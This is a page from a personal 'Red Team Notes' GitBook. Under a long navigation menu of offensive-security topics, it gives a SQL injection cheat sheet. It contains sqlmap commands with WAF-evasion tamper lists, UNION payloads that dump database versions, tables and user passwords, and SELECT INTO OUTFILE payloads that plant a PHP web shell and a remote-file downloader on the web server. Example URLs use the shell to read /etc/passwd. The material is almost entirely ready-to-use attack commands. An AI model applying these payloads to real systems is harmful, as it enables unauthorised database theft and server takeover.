Red Team Notes
1.0.0
1.0.0
  • Introduction
  • PowerShell
    • find_files_by_name
    • powershell_web_access
    • enable_psremoting
    • powershell_sans_cheat
    • powerup_-_privilege_escalation
    • user_enumeration
    • powershell_-_quickies
    • constrained_language_breakout
    • powershell_-_get-system
    • domain_enumeration
    • powershell
    • random_powershell
  • mainframe
    • tso_commands
    • nmap_stuff_-_recon
  • Links and Random
    • Commands--mount-shares
    • Commands--responder
    • Commands--nac_testing
    • trash
    • Commands--nessus-openvas
    • Commands--named_pipes
    • ptx
    • Commands--mortar-shells
    • Redis-Cheatsheet
    • wifi_driver_stuff
    • bypassing_applocker_living_off_land
    • Commands--remote_and_local_file_inclusion
    • Commands--netcat-ftp
    • mimikatz
  • wifi-hacking
    • eaphammer
    • aircrack-ng_and_jtr_attack
    • new_page
    • cracking_wpa_attack
    • aircrack-ng
    • wifite
    • basics
    • hostapd
    • cowpatty_attack
    • rogue_access_point
    • cracking_wep_via_a_client_attack
    • handshake-via-pcap
    • clientless_wep_attack
    • fluxion
    • reaver
    • crack_wep
    • pyrit_attack
    • wep_shared_key_authentication_attack
  • mobile
    • qark
    • dex2jar
    • jd-gui
    • mobile
    • baby_steps
    • apktool
    • smali_and_baksmali
  • Cobalt-Strike
    • apache_rewrite_.htaccess
    • playbook
      • mail_and_smtp_enumeration-manipulation
      • lateral_movement
      • overpass_the_hash_with_rubeus-beacon_-_h
      • persistence
      • privilege_escalation
      • after_initial_access
    • situational_awareness_-_harmj0y
    • malleable
    • sid_hopping
    • generating_certificates
    • safety
    • random_commands
    • golden_ticket
    • go_daddy_domain
    • github_repos
    • malware_av_evasion
    • malware_av_evasion--main.go
    • c2_infrastructure
    • cobalt_strike_certificates
    • cpl_resource_runner_payload
  • Metasploit
    • nessus
    • network
    • meterpreter
  • Information Gathering Enumeration
    • 35 Searchsploit
    • 30 Find
    • 21 WinRM
    • 50 Gobuster
    • Enumeration by Port Number
    • 40 Active Directory
    • Linux Prevesc
    • pivoting
    • 20 Reconnoitre
    • Kerberos cheatsheet
    • 11 SMB Part 1
    • 00 ENUMERATION
    • 10 Nmap
    • 12-check-for-anonymous-smb
    • bruteforcing
    • 60 DNS Enumeration
    • 15 Firefox
  • Commands
    • rbash
    • tools-sources
    • tar
    • network-change-ip
    • sed_and_changing_files_for_malware_evasi
    • web_discovery
    • xxd
    • droopescan
    • c#
    • proxychains-admin-network
    • de-duplicate
    • privilege-escalation-windows_-_and_empir
    • ping_sweep
    • wget
    • snmp
    • custom-payloads
    • python
    • curl-wget
    • proxychains
    • goddi_-_domain_enumeration
    • nginx-bypass
    • outlook_and_owa
    • physical_hacking--rasperry_pi
    • have_a_shell
    • xml-xxe-xpath
    • xss-iframe
    • port-forward
    • physical_hacking
    • pack
    • client-side-iframe-attack
    • waf
    • laps
    • images-with-files-in-them
    • fresh-install
    • privilege-escalation-linux
    • masscan
    • arp-spoof
    • shellshock-squid
    • merlin
    • redis
    • get-browserdata
    • lateral_movement
    • smb-netbios-rpc
    • password-cracking
    • virtual-box_guest_additions
    • host_discovery-dns
    • certificate_tls_and_ssl
    • postgresql
    • physical_hacking--bash_bunny
    • powerview--new_page
    • mail_sniper
    • searchsploit
    • crackmapexec
    • user_agent
    • lolbins
    • files-inside-of-pictures
    • random_shellcode_-_scratch-pad
    • linux
    • ports
    • block-ip-iptables
    • httpscreenshot
    • dnscat
    • wp-scan
    • gather-gpp-creds
    • group-policy-decrypt-passwords
    • buffer-overflow
    • mac_address_change
    • sql
    • compiling-code
    • shell-for-buffer-overflow
    • hex_encode_command_line
    • spawn_a_better_shell_-_break_out_of_shit
    • nikto-proxy
    • osint
    • assembly
    • sshuttle
    • nmap_and_scanning
    • root_user_add
    • pass_the_hash
    • test-for-xxe
    • payloads
    • webdav
    • cut_commands
    • unicorn_scan
    • rdesktop_and_screen_for_linux
    • spooler_exploit
    • dns-zone-transfer
    • ssh
    • password-grep
  • reverse-shell-one-liners
    • ruby
    • c-language-reverse-shell
    • reverse_shell_one_liners
    • perl-reverse-shell-cgi-format
    • java_reverse_shell
    • python_reverse_shell
  • Bypass-Applocker
    • vbs_macro
    • pubprn.vbs
    • demiguise
    • mshta
    • regsvcs
    • regasm_2
    • bypass-uac
    • installutil
  • windows
    • uninstall_patches
    • passwords
    • powerview_3.0,_harmj0y
    • port_forward
    • powerview_acl_enum-abuse
    • powerview,_enumerate_groups-ac
    • search_4_loot
    • firewall
    • laps_abuse
    • enumeration
    • Windows
    • Windows_service_abuse
    • Windows Enumeration
  • mimikatz
    • mimikatz_list_modules
    • list_commands_in_module
    • mimikatz
    • remote_control_rpc
    • applocker_bypass_and_other_sn
    • mimikatz_-_start_and_stop_processes
    • base64_all_the_things
    • rdp
    • avoid_new_events
    • mimikatz_-_tokens
  • red-team
    • privilege_escalation_across_trusts
    • file_servers_and_files
    • lateral_movement
    • Commands--red_team
    • forest_enumeration
    • persistence_techniques
    • privilege_escalation
  • Start Procedure
    • Start-Procedure
  • Tools to add to Kali Linux
  • AD-notes
    • more-ad-notes
    • bloodhound
    • ad-notes-chirag
    • enumeration
    • pam_abuse
    • laps_abuse
    • domain_privilege_escalation
    • active_directory_one_liners
  • Setting up Kali Linux
    • Tools to add to Kali Linux
    • Items to Install in Kali
      • tmux
        • tmux_config
        • Setup_-_TMUX
        • tmux_cheat_sheet
      • crontab
      • rclone
      • Items_to_install_in_Kali
    • Tools to install
  • SQL
    • abusing_sql_server_trusts--privilege_escalation
    • abusing_sql_server_trusts
    • abusing_sql_server_trusts--post_exploitation_enumeration
    • 31 SQL
  • tools to install
  • command line
  • simple note
  • Enumeration
  • Tools to install on Windows
  • temp-readme
Powered by GitBook
On this page
  • SQLMAP
  • Down below change the injection URL into what you need I.E. instead of selfie4you.com type in google #or whatever you are attacking.
  • -------------------

Was this helpful?

  1. Commands

sql

Previousmac_address_changeNextcompiling-code

Last updated 3 years ago

Was this helpful?

SQL

SQLMAP

sqlmap -r report.req --dbms=mysql --technique=U --dbms mysql --level 5 --risk 3 -p id --dump

-r is the file name --dbms is the database type --technique is the type - U is union -p is the parameter, in this case the parameter that is vulnerable is id --level checks everything, user agents, cookies, all parameters --risk will blow up how much traffic you generate and might get you caught

SQLmap post parameter shit

see the request below? add it to a text file and save whatever request you are attempting to exploit

then

select which parameter - in this parameter, the post requests you can check user, admin, and pass

so, if you wanna check user parameter, do this

sqlmap -r this-filename.txt -p user

or if you wanna check the pass field, do this

sqlmap -r this-filename.txt -p pass

get it? got it? good

POST /?page=login HTTP/1.1 Host: 192.168.91.129 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: Cookie: PHPSESSID=81uqq56dr9jb3o35qa2jdv0u61 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 50

user=admin&pass=admin&submit=Login

MySQL tampering tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

MSSQL tampering tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

General Tampering tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

sqlmap -r /root/Desktop/request.txt -p --user agent

IP-address/cat.php?id=1 UNION SELECT 1,@@version,3,4--

IP-address/cat.php?id=1 UNION SELECT 1,database(),3,4--

IP-address/cat.php?id=1 UNION SELECT 1,current_user(),3,4--

IP-address/cat.php?id=1 UNION SELECT 1,@@datadir,3,4--

IP-address/cat.php?id=1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

IP-address/cat.php?id=1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="users"--

IP-address/cat.php?id=1 UNION SELECT 1,group_concat(id,0x3a,login,0x3a,password),3,4 FROM photoblog.users--

' OR '1'='1

To write a PHP shell: o SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';

2nd Order SQL

Down below change the injection URL into what you need I.E. instead of selfie4you.com type in google #or whatever you are attacking.

-------------------

/usr/share/sqlmap/tamper/init.py /usr/share/sqlmap/tamper/apostrophemask.py /usr/share/sqlmap/tamper/apostrophenullencode.py /usr/share/sqlmap/tamper/appendnullbyte.py /usr/share/sqlmap/tamper/base64encode.py /usr/share/sqlmap/tamper/between.py /usr/share/sqlmap/tamper/between.pyc /usr/share/sqlmap/tamper/bluecoat.py /usr/share/sqlmap/tamper/chardoubleencode.py /usr/share/sqlmap/tamper/charencode.py /usr/share/sqlmap/tamper/charencode.pyc /usr/share/sqlmap/tamper/charunicodeencode.py /usr/share/sqlmap/tamper/charunicodeencode.pyc /usr/share/sqlmap/tamper/commalessmid.py /usr/share/sqlmap/tamper/concat2concatws.py /usr/share/sqlmap/tamper/equaltolike.py /usr/share/sqlmap/tamper/equaltolike.pyc /usr/share/sqlmap/tamper/greatest.py /usr/share/sqlmap/tamper/greatest.pyc /usr/share/sqlmap/tamper/halfversionedmorekeywords.py /usr/share/sqlmap/tamper/ifnull2ifisnull.py /usr/share/sqlmap/tamper/informationschemacomment.py /usr/share/sqlmap/tamper/lowercase.py /usr/share/sqlmap/tamper/modsecurityversioned.py /usr/share/sqlmap/tamper/modsecurityzeroversioned.py /usr/share/sqlmap/tamper/multiplespaces.py /usr/share/sqlmap/tamper/multiplespaces.pyc /usr/share/sqlmap/tamper/nonrecursivereplacement.py /usr/share/sqlmap/tamper/nonrecursivereplacement.pyc /usr/share/sqlmap/tamper/overlongutf8.py /usr/share/sqlmap/tamper/percentage.py /usr/share/sqlmap/tamper/randomcase.py /usr/share/sqlmap/tamper/randomcase.pyc /usr/share/sqlmap/tamper/randomcomments.py /usr/share/sqlmap/tamper/securesphere.py /usr/share/sqlmap/tamper/sp_password.py /usr/share/sqlmap/tamper/space2comment.py /usr/share/sqlmap/tamper/space2comment.pyc /usr/share/sqlmap/tamper/space2dash.py /usr/share/sqlmap/tamper/space2dash.pyc /usr/share/sqlmap/tamper/space2hash.py /usr/share/sqlmap/tamper/space2morehash.py /usr/share/sqlmap/tamper/space2mssqlblank.py /usr/share/sqlmap/tamper/space2mssqlhash.py /usr/share/sqlmap/tamper/space2mysqlblank.py /usr/share/sqlmap/tamper/space2mysqldash.py /usr/share/sqlmap/tamper/space2mysqldash.pyc /usr/share/sqlmap/tamper/space2plus.py /usr/share/sqlmap/tamper/space2randomblank.py /usr/share/sqlmap/tamper/symboliclogical.py /usr/share/sqlmap/tamper/symboliclogical.pyc /usr/share/sqlmap/tamper/unionalltounion.py /usr/share/sqlmap/tamper/unmagicquotes.py /usr/share/sqlmap/tamper/unmagicquotes.pyc /usr/share/sqlmap/tamper/uppercase.py /usr/share/sqlmap/tamper/uppercase.pyc /usr/share/sqlmap/tamper/varnish.py /usr/share/sqlmap/tamper/versionedkeywords.py /usr/share/sqlmap/tamper/versionedmorekeywords.py /usr/share/sqlmap/tamper/xforwardedfor.py /usr/share/sqlmap/tamper/xforwardedfor.pyc

sqlmap -u '' -p user-agent --random-agent --banner

sqlmap -u -p user-agent --random-agent --banner --tamper=randomcase,space2comment,apostrophemask,informationschemacomment

o and then access it at: o o To write a downloader: o SELECT '<? fwrite(fopen($_GET[f], \'w\'), file_get_contents($_GET[u])); ?>' INTO OUTFILE '/var/www/get.php'

o and then access it at: o

sqlmap -u '' --technique=U \r\n

Usage ' union select user(); -- -*enter in malicious payload \r\n

http://192.168.91.129/?page=login
http://1.sqli.labs/
http://5.sqli.labs
http://localhost/shell.php?c=cat /etc/passwd
http://localhost/get.php?f=shell.php&u=__URLSTART__http://localhost/c99.txt
http://127.0.0.1/2ndOrderPAYLOAD.php?payload=x
http://127.0.0.1/2ndOrderPAYLOAD.php?payload=
https://websec.ca/kb/sql_injection